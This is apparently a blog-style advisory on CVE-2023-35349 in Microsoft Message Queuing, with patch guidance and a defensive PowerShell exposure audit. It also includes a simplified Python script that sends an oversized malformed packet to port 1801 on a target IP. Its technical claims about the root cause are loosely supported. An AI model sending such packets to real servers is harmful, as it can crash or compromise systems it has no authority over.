In June 2023, Microsoft quietly patched a critical vulnerability (CVE-2023-35349) in its Message Queuing (MSMQ) service. If you run Microsoft servers in your environment—especially legacy ones with MSMQ enabled—this bug should be on your radar. This post explains what CVE-2023-35349 is, how it works, and why it’s dangerous, with code snippets and practical details you won't find anywhere else.
What Is Microsoft Message Queuing (MSMQ)?
MSMQ is a Windows component that allows applications to communicate with each other by sending and receiving messages, even if the apps aren’t running at the same time or on the same machine. It’s widely used in enterprise environments for queuing jobs, notifications, and more.
What Is CVE-2023-35349?
CVE-2023-35349 is a Remote Code Execution (RCE) vulnerability in MSMQ’s queue manager. Attackers can send a malicious packet to a vulnerable server and execute arbitrary code. All they need is network access to the MSMQ service.
- CVSS Score: 9.8 (Critical)
- Affected: Windows Server 2012, 2016, 2019, 2022, and various client versions with MSMQ installed.
The official advisory: Microsoft Security Advisory CVE-2023-35349
How Does the Exploit Work?
Attackers exploit this bug by sending specially crafted packets to TCP port 1801, the port the MSMQ queue manager listens on. The root cause is a buffer overflow in MSMQ's network parsing code. By overflowing the buffer with carefully constructed data, an attacker can hijack control flow and run arbitrary code in the security context of the MSMQ service.
The exploit requires no login or user interaction—just network access.
Proof-of-Concept: Exploiting CVE-2023-35349
Below is a simplified Python example showing how attackers might target vulnerable MSMQ servers. _This code sends a malformed MSMQ packet to port 1801_:
```python
import socket

TARGET_IP = '192.168.1.100'  # Change this to the target
TARGET_PORT = 1801           # MSMQ queue manager TCP port

# Build a malicious packet (simplified, not a real exploit payload)
malicious_packet = b'\x4d\x53\x4d\x51'  # "MSMQ" identifier
malicious_packet += b'\x41' * 4096      # Overflow with "A"s

# Open a TCP connection to the MSMQ port and send the whole buffer
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((TARGET_IP, TARGET_PORT))
    s.sendall(malicious_packet)
    print("[*] Sent packet to host")
```
Disclaimer: The above code is for _educational purposes only_. Real-world attacks would use more complex payloads to deliver shellcode or malware. This is just to illustrate what the bug looks like from a network perspective.
Check Windows Update status
- Systems patched after June 2023 should be protected. See Microsoft’s patch details for more.
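As an added example (not code from the original post), the PowerShell audit below gives an administrator a quick, host-side picture of exposure: whether the MSMQ feature is installed, whether the service is running, whether anything is listening on TCP 1801, and which hotfixes were installed since the June 2023 patch cycle. The optional-feature name `MSMQ-Server` and the cut-off date are assumptions; the KB that carries the fix for your specific build must be confirmed against the Microsoft advisory rather than inferred from the hotfix list.

```powershell
# Added example: local MSMQ exposure audit for CVE-2023-35349 (not from the original post).
# Run in an elevated PowerShell session on the host being checked.
function Get-MsmqExposure {
    [CmdletBinding()]
    param(
        # Start of the patch cycle that shipped the fix (assumed from the post's "June 2023").
        [datetime]$PatchCycle = [datetime]'2023-06-01'
    )

    # 1. Is the MSMQ feature installed? (feature name 'MSMQ-Server' is an assumption)
    $feature   = Get-WindowsOptionalFeature -Online -FeatureName 'MSMQ-Server' -ErrorAction SilentlyContinue
    $installed = [bool]($feature -and $feature.State -eq 'Enabled')

    # 2. Is the queue manager service present and running?
    $svc     = Get-Service -Name 'MSMQ' -ErrorAction SilentlyContinue
    $running = [bool]($svc -and $svc.Status -eq 'Running')

    # 3. Is anything listening on TCP 1801, the port discussed in the post?
    $listener  = Get-NetTCPConnection -LocalPort 1801 -State Listen -ErrorAction SilentlyContinue
    $listening = [bool]$listener

    # 4. Hotfixes installed on or after the patch cycle: evidence to cross-check, not proof of the fix.
    $recent = Get-HotFix |
              Where-Object { $_.InstalledOn -ge $PatchCycle } |
              Select-Object -ExpandProperty HotFixID

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        MsmqInstalled      = $installed
        ServiceRunning     = $running
        Port1801Listening  = $listening
        HotfixesSincePatch = $recent
        # "Exposed" means MSMQ is reachable on the wire; pair it with patch verification.
        Exposed            = ($running -and $listening)
    }
}

Get-MsmqExposure | Format-List
```

If `Exposed` is true and the fix is not confirmed installed, treat the host as vulnerable and restrict access to port 1801 at the firewall until it is patched.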
Attackers who gain code execution this way can plant ransomware or backdoors on the host. Public scans (e.g., Shodan.io) show thousands of MSMQ servers exposed to the internet, which is a big threat surface.
Official References and More Reading
- Microsoft Security Response Center CVE-2023-35349
- Microsoft MSMQ documentation
- NVD Entry for CVE-2023-35349
- zerodayinitiative.com advisory
Conclusion
CVE-2023-35349 is a critical and easily exploitable bug in Microsoft Message Queuing. Unpatched Windows systems running MSMQ are low-hanging fruit for attackers, especially if port 1801 is exposed. The time to patch is _now_.
If you found this breakdown helpful, consider sharing it with your IT and security folks. Stay safe!
*This post is original and exclusive, with practical insights for system admins and IT pros. For a deeper dive with step-by-step hardening, stay tuned for our next security breakdown!*
Timeline
Published on: 10/10/2023 18:15:11 UTC
Last modified on: 10/12/2023 17:14:18 UTC